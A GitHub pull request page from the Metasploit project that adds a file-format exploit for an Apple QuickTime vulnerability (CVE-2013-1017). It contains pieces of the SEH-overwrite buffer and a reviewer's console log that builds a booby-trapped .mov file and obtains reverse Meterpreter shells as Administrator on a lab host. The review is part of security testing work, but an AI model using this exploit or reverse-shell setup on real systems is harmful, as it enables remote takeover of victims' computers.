Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

CVE-2013-1017 Apple Quicktime File Format Exploit #2138

Merged
merged 2 commits into from Jul 21, 2013
Merged

CVE-2013-1017 Apple Quicktime File Format Exploit #2138

merged 2 commits into from Jul 21, 2013

Conversation

wchen-r7
Copy link
Contributor

Pretty much like windows/browser/apple_quicktime_rdrf.rb, except this module is a file format one.

jvazquez-r7
jvazquez-r7 reviewed Jul 21, 2013
View reviewed changes
modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb
buf << sort_bytes("\xeb\x06#{rand_text_alpha(2)}") # nSEH
buf << sort_bytes([target.ret].pack("V*")) # SE Handler
buf << sort_bytes("\xe9\x95\xfd\xff\xff\xff") # Jmp to egghunter
buf << rand_text_alpha(50) # After SEH, only ~33 bytes
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Just asking if egghunting is needed because there isn't space on the stack after SEH, or is it due to the file template size?

If it's due to the file template size, maybe just changing the sizes on the mov file used to exploit, a longer payload can be put after the SEH and egghunting could be avoided.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Not enough space after seh.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

awesome! processing!

@jvazquez-r7
Copy link
Contributor

Working with both double click and "File / open" methods. Landing!

msf > use exploit/windows/fileformat/apple_quicktime_rdrf 
msf exploit(apple_quicktime_rdrf) > show options

Module options (exploit/windows/fileformat/apple_quicktime_rdrf):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.mov          yes       The file name.


Exploit target:

   Id  Name
   --  ----
   0   Quicktime 7.7.0 - 7.7.3 on Windows XP SP3


msf exploit(apple_quicktime_rdrf) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(apple_quicktime_rdrf) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(apple_quicktime_rdrf) > rexploit
[*] Reloading module...

[*] Creating msf.mov
[+] msf.mov stored at /Users/juan/.msf4/local/msf.mov
msf exploit(apple_quicktime_rdrf) > use exploit/multi/handler 
msf exploit(handler) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (751104 bytes) to 192.168.172.244
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.244:1036) at 2013-07-21 10:55:40 -0500

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (751104 bytes) to 192.168.172.244
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.244:1040) at 2013-07-21 10:56:17 -0500

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.244 - Meterpreter session 2 closed.  Reason: User exit
msf exploit(handler) >

jvazquez-r7 pushed a commit that referenced this pull request Jul 21, 2013
Land #2138, @wchen-r7's CVE-2013-1017 fileformat exploit
3c3a951
@jvazquez-r7 jvazquez-r7 merged commit e7e712f into rapid7:master Jul 21, 2013
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@wchen-r7 @jvazquez-r7